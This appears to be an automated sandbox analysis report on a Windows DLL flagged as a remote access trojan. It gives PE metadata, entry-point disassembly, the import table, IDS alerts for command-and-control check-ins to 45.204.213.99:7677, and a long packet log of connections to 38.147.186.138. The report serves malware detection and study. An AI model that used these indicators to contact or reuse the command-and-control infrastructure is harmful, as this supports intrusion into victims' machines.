                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u...u...u.......u..mt...u..mv...u..mq...u..mp...u.&.t...u...t.a.u...u...u.`mu...u.`mw...u.Rich..u........................
                            Icon Hash:7ae282899bbab082
                            Entrypoint:0x100a12e9
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x10000000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                            Time Stamp:0x67642B1D [Thu Dec 19 14:18:05 2024 UTC]
                            TLS Callbacks:0x10088fa0
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:5a379389d798d294fb7ce19042f3dcf5
                            Instruction
                            push ebp
                            mov ebp, esp
                            cmp dword ptr [ebp+0Ch], 01h
                            jne 00007F9EAD87D937h
                            call 00007F9EAD87D997h
                            push dword ptr [ebp+10h]
                            push dword ptr [ebp+0Ch]
                            push dword ptr [ebp+08h]
                            call 00007F9EAD87D7E3h
                            add esp, 0Ch
                            pop ebp
                            retn 000Ch
                            push ebp
                            mov ebp, esp
                            sub esp, 14h
                            lea eax, dword ptr [ebp-0Ch]
                            xorps xmm0, xmm0
                            push eax
                            movlpd qword ptr [ebp-0Ch], xmm0
                            call dword ptr [100A60C0h]
                            mov eax, dword ptr [ebp-08h]
                            xor eax, dword ptr [ebp-0Ch]
                            mov dword ptr [ebp-04h], eax
                            call dword ptr [100A60CCh]
                            xor dword ptr [ebp-04h], eax
                            call dword ptr [100A611Ch]
                            xor dword ptr [ebp-04h], eax
                            lea eax, dword ptr [ebp-14h]
                            push eax
                            call dword ptr [100A6148h]
                            mov eax, dword ptr [ebp-10h]
                            lea ecx, dword ptr [ebp-04h]
                            xor eax, dword ptr [ebp-14h]
                            xor eax, dword ptr [ebp-04h]
                            xor eax, ecx
                            leave
                            ret
                            mov ecx, dword ptr [10102040h]
                            push esi
                            push edi
                            mov edi, BB40E64Eh
                            mov esi, FFFF0000h
                            cmp ecx, edi
                            je 00007F9EAD87D936h
                            test esi, ecx
                            jne 00007F9EAD87D958h
                            call 00007F9EAD87D8C9h
                            mov ecx, eax
                            cmp ecx, edi
                            jne 00007F9EAD87D939h
                            mov ecx, BB40E64Fh
                            jmp 00007F9EAD87D940h
                            test esi, ecx
                            jne 00007F9EAD87D93Ch
                            or eax, 00004711h
                            shl eax, 10h
                            or ecx, eax
                            mov dword ptr [10102040h], ecx
                            not ecx
                            pop edi
                            mov dword ptr [10102080h], ecx
                            pop esi
                            ret
                            push ebp
                            mov ebp, esp
                            cmp dword ptr [ebp+0Ch], 01h
                            jne 00007F9EAD87D944h
                            cmp dword ptr [0000F88Ch], 00000000h
                            Programming Language:
                            • [IMP] VS2008 SP1 build 30729
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x100a800x54.rdata
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x100ad40xdc.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1030000x4d0c.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0xff9580x54.rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0xff9c00x18.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xff8980x40.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xa60000x20c.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000xa48330xa4a009db27373bcf74384313548cdff739b89False0.5883815015186029data6.520667142363245IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0xa60000x5b80e0x5ba00b940f5bdafb172ca49d82aa5efc8081cFalse0.5340211459754434data6.20745028003892IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x1020000x4d80x2008917dd775708aa9b2d3e4f127fc8a4f9False0.119140625data0.6084715227586681IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .reloc0x1030000x4d0c0x4e00cc372a90e2aea2d045cbc1a9ae8ecd34False0.7442407852564102data6.595328231641845IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            DLLImport
                            bcryptprimitives.dllProcessPrng
                            api-ms-win-core-synch-l1-2-0.dllWaitOnAddress, WakeByAddressSingle, WakeByAddressAll
                            kernel32.dllSwitchToThread, SetUnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, InitializeSListHead, HeapReAlloc, HeapFree, Sleep, DisableThreadLibraryCalls, GetSystemTimeAsFileTime, GetModuleHandleW, WaitForSingleObject, GetCurrentThreadId, SetWaitableTimer, GetModuleHandleA, GetFinalPathNameByHandleW, SetLastError, GetQueuedCompletionStatusEx, SetHandleInformation, CreateIoCompletionPort, FreeLibrary, GetCurrentProcess, GetStdHandle, GetConsoleMode, GetProcAddress, MultiByteToWideChar, WriteConsoleW, QueryPerformanceFrequency, FormatMessageW, WaitForSingleObjectEx, LoadLibraryA, lstrlenW, GetCurrentProcessId, CreateMutexA, ReleaseMutex, GetEnvironmentVariableW, GetLastError, LoadLibraryExW, SetThreadErrorMode, CloseHandle, CreateThread, SetThreadStackGuarantee, GetCurrentThread, QueryPerformanceCounter, HeapAlloc, GetProcessHeap, GetCurrentDirectoryW, RtlCaptureContext, WideCharToMultiByte, PostQueuedCompletionStatus, UnhandledExceptionFilter, CreateWaitableTimerExW, SetFileCompletionNotificationModes, TerminateProcess
                            ws2_32.dllWSACleanup, WSASend, bind, connect, setsockopt, WSAStartup, getaddrinfo, getsockopt, recv, send, getpeername, freeaddrinfo, closesocket, WSAIoctl, ioctlsocket, WSASocketW, getsockname, WSAGetLastError, shutdown
                            ntdll.dllRtlNtStatusToDosError, NtDeviceIoControlFile, NtCreateFile, NtWriteFile, NtCancelIoFileEx
                            secur32.dllEncryptMessage, FreeCredentialsHandle, DeleteSecurityContext, DecryptMessage, ApplyControlToken, FreeContextBuffer, QueryContextAttributesW, AcquireCredentialsHandleA, InitializeSecurityContextW, AcceptSecurityContext
                            advapi32.dllRegOpenKeyExW, RegCloseKey, RegQueryValueExW
                            crypt32.dllCertFreeCertificateChain, CertEnumCertificatesInStore, CertAddCertificateContextToStore, CertDuplicateStore, CertCloseStore, CertDuplicateCertificateChain, CertOpenStore, CertDuplicateCertificateContext, CertVerifyCertificateChainPolicy, CertGetCertificateChain, CertFreeCertificateContext
                            VCRUNTIME140.dll_except_handler4_common, __CxxFrameHandler3, memcmp, memmove, memcpy, memset, __std_type_info_destroy_list
                            api-ms-win-crt-runtime-l1-1-0.dll_seh_filter_dll, _initterm_e, _initialize_narrow_environment, _initialize_onexit_table, _initterm, _execute_onexit_table, _configure_narrow_argv, _cexit
                            NameOrdinalAddress
                            NvOptimusEnablement10x100038c8
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-12-22T09:29:07.990203+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.44973645.204.213.997677TCP
                            2024-12-22T09:30:23.404849+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.44973945.204.213.997677TCP
                            2024-12-22T09:31:35.424214+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.44974045.204.213.997677TCP
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 22, 2024 09:29:00.031868935 CET49730443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:00.031965971 CET4434973038.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:00.031992912 CET49731443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:00.032035112 CET4434973138.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:00.032040119 CET49730443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:00.032083988 CET49731443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:00.045645952 CET49730443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:00.045687914 CET49731443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:00.045691013 CET4434973038.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:00.045708895 CET4434973138.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:01.880784035 CET4434973038.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:01.880918026 CET49730443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:01.885495901 CET4434973138.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:01.885581970 CET49731443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:01.909106970 CET49730443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:01.909153938 CET4434973038.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:01.909549952 CET4434973038.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:01.910880089 CET49731443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:01.910906076 CET4434973138.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:01.911721945 CET4434973138.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:01.963486910 CET49730443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:01.965003014 CET49731443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.117253065 CET49730443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.159359932 CET4434973038.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:02.228447914 CET49731443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.275338888 CET4434973138.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:02.645195007 CET4434973038.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:02.645560980 CET4434973038.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:02.645636082 CET49730443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.646421909 CET49730443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.646469116 CET4434973038.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:02.664660931 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.664695024 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:02.664758921 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.665117979 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.665131092 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:02.761069059 CET4434973138.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:02.761244059 CET4434973138.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:02.761300087 CET49731443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.761683941 CET49731443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.761703968 CET4434973138.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:02.774610996 CET49733443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.774647951 CET4434973338.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:02.774701118 CET49733443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.780478001 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.780512094 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:02.780580044 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.781450033 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.781476021 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:02.782063007 CET49733443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:02.782078981 CET4434973338.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:04.313266039 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:04.313352108 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:04.315431118 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:04.315445900 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:04.315773010 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:04.316246033 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:04.359370947 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:04.419727087 CET4434973338.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:04.419847012 CET49733443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:04.421238899 CET49733443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:04.421251059 CET4434973338.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:04.421916008 CET4434973338.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:04.427730083 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:04.427822113 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:04.449307919 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:04.449335098 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:04.450237036 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:04.450890064 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:04.463463068 CET49733443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:04.464875937 CET49733443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:04.491350889 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:04.511338949 CET4434973338.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.152226925 CET4434973338.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.152374983 CET4434973338.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.152437925 CET49733443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.152767897 CET49733443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.152782917 CET4434973338.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.173650980 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.173676968 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.173743010 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.182595968 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.182610035 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.190304995 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.190332890 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.190360069 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.190402985 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.190437078 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.190468073 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.190489054 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.221323967 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.221384048 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.221426964 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.221461058 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.221482038 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.221517086 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.221544981 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.325329065 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.325351954 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.325412989 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.325450897 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.325483084 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.325505972 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.413317919 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.413342953 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.413381100 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.413398027 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.413439035 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.413460016 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.429483891 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.429511070 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.429553986 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.429558039 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.429600954 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.429617882 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.429627895 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.429678917 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.485991955 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.486012936 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.486053944 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.486068010 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.486094952 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.486116886 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.517405987 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.517462969 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.517481089 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.517496109 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.517535925 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.517554998 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.559057951 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.559084892 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.559127092 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.559140921 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.559186935 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.559186935 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.589837074 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.589889050 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.589934111 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.589950085 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.589988947 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.589988947 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.610101938 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.610131025 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.610198975 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.610212088 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.610239029 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.610259056 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.668562889 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.668622971 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.668652058 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.668664932 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.668704033 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.668704033 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.669809103 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.669872999 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.669897079 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.669909954 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.669938087 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.669955969 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.714641094 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.714687109 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.714726925 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.714740038 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.714771032 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.714791059 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.721091986 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.721133947 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.721168995 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.721182108 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.721209049 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.721226931 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.745690107 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.745786905 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.745800972 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.745843887 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.745903015 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.746294022 CET49732443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.746318102 CET4434973238.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.779542923 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.779589891 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.779655933 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.779655933 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.779671907 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.779730082 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.822565079 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.822604895 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.822779894 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.822796106 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.822850943 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.850045919 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.850197077 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.850212097 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.850248098 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:05.850303888 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.850584030 CET49734443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:05.850600958 CET4434973438.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:06.814173937 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:06.814263105 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:06.815629005 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:06.815642118 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:06.815963984 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:06.816498041 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:06.859376907 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:07.666239023 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:07.666322947 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:07.666367054 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:07.666400909 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:07.666429996 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:07.666450024 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:07.666477919 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:07.792465925 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:07.792521000 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:07.792534113 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:07.792550087 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:07.792567968 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:07.792588949 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:07.866497040 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:07.878065109 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:07.878134966 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:07.878170967 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:07.878181934 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:07.878343105 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:07.935781002 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:07.949845076 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:07.949891090 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:07.949918032 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:07.949934959 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:07.949954987 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:07.949979067 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:07.986484051 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:07.986603975 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:07.990202904 CET497367677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:08.018666983 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:08.018734932 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:08.018744946 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:08.018759012 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:08.018789053 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:08.018796921 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:08.055532932 CET76774973745.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:08.055608988 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:08.056134939 CET497377677192.168.2.445.204.213.99
                            Dec 22, 2024 09:29:08.064946890 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:08.065016985 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:08.065017939 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:08.065048933 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:08.065073967 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:08.065104008 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:08.109751940 CET76774973645.204.213.99192.168.2.4
                            Dec 22, 2024 09:29:08.122195959 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:08.122293949 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:08.122420073 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:08.122431040 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:08.122474909 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:08.166079044 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:08.166138887 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:08.166153908 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:08.166162968 CET4434973538.147.186.138192.168.2.4
                            Dec 22, 2024 09:29:08.166215897 CET49735443192.168.2.438.147.186.138
                            Dec 22, 2024 09:29:08.166457891 CET49735443192.168.2.438.147.186.138
